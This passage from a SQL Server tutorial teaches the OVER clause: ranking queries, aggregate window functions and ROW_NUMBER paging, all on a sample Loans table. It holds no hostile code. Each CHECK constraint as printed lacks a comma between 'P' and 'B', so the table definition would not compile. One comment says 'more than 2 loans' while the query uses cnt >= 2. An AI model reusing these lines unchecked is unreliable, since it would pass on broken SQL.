       (10, '20080815', 1000.00, 9, 'P'),

       (11, '20080715', 5500.00, 10, 'P'),

       (12, '20080615', 1000.00, 11, 'B'),

       (13, '20080820', 6000.00, 12, 'P'),

       (14, '20080510', 28000.00, 6, 'B'),

       (15, '20080815', 2000.00, 10, 'P'),

       (16, '20080810', 1500.00, 8, 'P'),

       (17, '20080817', 10000.00, 10, 'B'),

       (18, '20080816', 2500.00, 9, 'P');  

 

-- Top 3 loans by loan type (no ties)

SELECT loan_nbr, loan_type, loan_amount, rk

FROM (SELECT loan_nbr, loan_type, loan_amount,

            ROW_NUMBER() OVER(PARTITION BY loan_type

                               ORDER BY loan_amount DESC) AS rk

      FROM Loans) AS L

WHERE rk <= 3;

 

-- Top 3 loans by loan type (with ties)

SELECT loan_nbr, loan_type, loan_amount, rk

FROM (SELECT loan_nbr, loan_type, loan_amount,

            DENSE_RANK() OVER(PARTITION BY loan_type

                               ORDER BY loan_amount DESC) AS rk

      FROM Loans) AS L

WHERE rk <= 3;

 

-- Latest loan for each customer

SELECT customer_nbr, loan_nbr, loan_type, loan_amount, loan_date

FROM (SELECT loan_nbr, loan_type, loan_amount,

            customer_nbr, loan_date,

            ROW_NUMBER() OVER(PARTITION BY customer_nbr

                               ORDER BY loan_date DESC) AS rk

      FROM Loans) AS L

WHERE rk = 1;

Aggregate Window Functions

The addition of the OVER clause in SQL Server was a great enhancement to the T-SQL language. Using the ranking functions has helped solve an array of problems in a very efficient manner. While there is a huge benefit of the ranking functions, it is often overlooked that the OVER clause supports now aggregate window functions. This means that the window aggregate function (SUM, AVG, COUNT, MIN, MAX) computes a value for each row from a result set derived from the window (partition). That opens an opportunity to solve problems using new methods.

Here are a couple examples to demonstrate using aggregate window functions with the OVER clause.

CREATE TABLE Loans (

  loan_nbr INT NOT NULL PRIMARY KEY,

  loan_date DATETIME NOT NULL,

  loan_amount DECIMAL(12, 2) NOT NULL

              DEFAULT 0.0,

  customer_nbr INT NOT NULL,

  loan_type CHAR(1) NOT NULL

            DEFAULT 'P'

            CHECK (loan_type IN ('P'-- personal

                                'B')) -- business

  );

 

INSERT INTO Loans

VALUES (1, '20080801', 12000.00, 2, 'P'),

       (2, '20080805', 15700.00, 1, 'B'),

       (3, '20080610', 12000.00, 3, 'P'),

       (4, '20080401', 5000.00, 1, 'P'),

       (5, '20080715', 25000.00, 4, 'B'),

       (6, '20080610', 25000.00, 5, 'P'),

       (7, '20080501', 1000.00, 6, 'P'),

       (8, '20080810', 6000.00, 7, 'B'),

       (9, '20080815', 2000.00, 8, 'B'),

       (10, '20080815', 1000.00, 9, 'P'),

       (11, '20080715', 5500.00, 10, 'P'),

       (12, '20080615', 1000.00, 11, 'B'),

       (13, '20080820', 6000.00, 12, 'P'),

       (14, '20080510', 28000.00, 6, 'B'),

       (15, '20080815', 2000.00, 10, 'P'),

       (16, '20080810', 1500.00, 8, 'P'),

       (17, '20080817', 10000.00, 10, 'B'),

       (18, '20080816', 2500.00, 9, 'P');  

 

-- Aggregate window functions with the OVER clause

SELECT loan_nbr, loan_type, loan_amount, customer_nbr,

       SUM(loan_amount) OVER(PARTITION BY customer_nbr) AS total_customer_loans,

       AVG(loan_amount) OVER(PARTITION BY customer_nbr) AS avg_customer_loan_amt,

       MAX(loan_amount) OVER(PARTITION BY customer_nbr) AS max_customer_loan_amt,

       MIN(loan_amount) OVER(PARTITION BY customer_nbr) AS min_customer_loan_amt,

       COUNT(*) OVER(PARTITION BY customer_nbr) AS count_customer_loans

FROM Loans;

 

-- Calculate percent for current loan based on total customer loans

-- and total of all loans

SELECT loan_nbr, loan_type, loan_amount, customer_nbr,

       loan_amount /

       SUM(loan_amount) OVER(PARTITION BY customer_nbr) AS percent_of_customer_loans,

       loan_amount /

       SUM(loan_amount) OVER() AS percent_of_all_loans

FROM Loans;

 

-- Get customers (and all their loans) with more than 2 loans

SELECT customer_nbr, loan_nbr, loan_amount, cnt

FROM (SELECT customer_nbr, loan_nbr, loan_amount,

            COUNT(*) OVER(PARTITION BY customer_nbr) AS cnt

      FROM Loans) AS L

WHERE cnt >= 2;

Resources:

OVER Clause
http://msdn.microsoft.com/en-us/library/ms189461.aspx

Paging with Ranking Functions

Paging through result sets is a very common need in applications. It provides a convenient way to deliver small chunks of data to the client application, minimizing network traffic and allowing end users to browse data in page size format.

There are different methods to accomplish the paging, both on client and server side. The introduction of the ranking functions in SQL Server 2005 (and SQL Server 2008) provides another efficient tool to implement paging.

The following example demonstrates paging utilizing the ROW_NUMBER function. Here it helps to generate sequence for each row ordered by the loan date column, and the sequence is later used to split the result set into pages.

CREATE TABLE Loans (

  loan_nbr INT NOT NULL PRIMARY KEY,

  loan_date DATETIME NOT NULL,

  loan_amount DECIMAL(12, 2) NOT NULL

              DEFAULT 0.0,

  customer_nbr INT NOT NULL,

  loan_type CHAR(1) NOT NULL

            DEFAULT 'P'

            CHECK (loan_type IN ('P'-- personal

                                'B')) -- business

  );

 

INSERT INTO Loans

VALUES (1, '20080801', 12000.00, 2, 'P'),

       (2, '20080805', 15700.00, 1, 'B'),

       (3, '20080610', 12000.00, 3, 'P'),

       (4, '20080401', 5000.00, 1, 'P'),

       (5, '20080715', 25000.00, 4, 'B'),

       (6, '20080610', 25000.00, 5, 'P'),

       (7, '20080501', 1000.00, 6, 'P'),

       (8, '20080810', 6000.00, 7, 'B'),

       (9, '20080815', 2000.00, 8, 'B'),

       (10, '20080815', 1000.00, 9, 'P'),

       (11, '20080715', 5500.00, 10, 'P'),

       (12, '20080615', 1000.00, 11, 'B'),

       (13, '20080820', 6000.00, 12, 'P'),

       (14, '20080510', 28000.00, 6, 'B'),

       (15, '20080815', 2000.00, 10, 'P'),

       (16, '20080810', 1500.00, 8, 'P'),

       (17, '20080817', 10000.00, 10, 'B'),

       (18, '20080816', 2500.00, 9, 'P');  

 

-- Paging

DECLARE @page_size INT = 5;

DECLARE @page_nbr  INT = 4;

 

WITH LoansRanked (loan_date, loan_amount, loan_type, seq)

AS

(SELECT loan_date, loan_amount, loan_type,

        ROW_NUMBER() OVER (ORDER BY loan_date, loan_nbr)

FROM Loans)

SELECT loan_date, loan_amount, loan_type, seq

FROM LoansRanked

WHERE seq > (@page_nbr - 1) * @page_size

  AND seq <= @page_nbr * @page_size;

 

/*

 

Results (4th page which contains only 3 rows):

 

loan_date               loan_amount   loan_type seq

----------------------- ------------- --------- ----

2008-08-16 00:00:00.000     2500.00 P         16

2008-08-17 00:00:00.000     10000.00 B         17

2008-08-20 00:00:00.000     6000.00 P         18

 

*/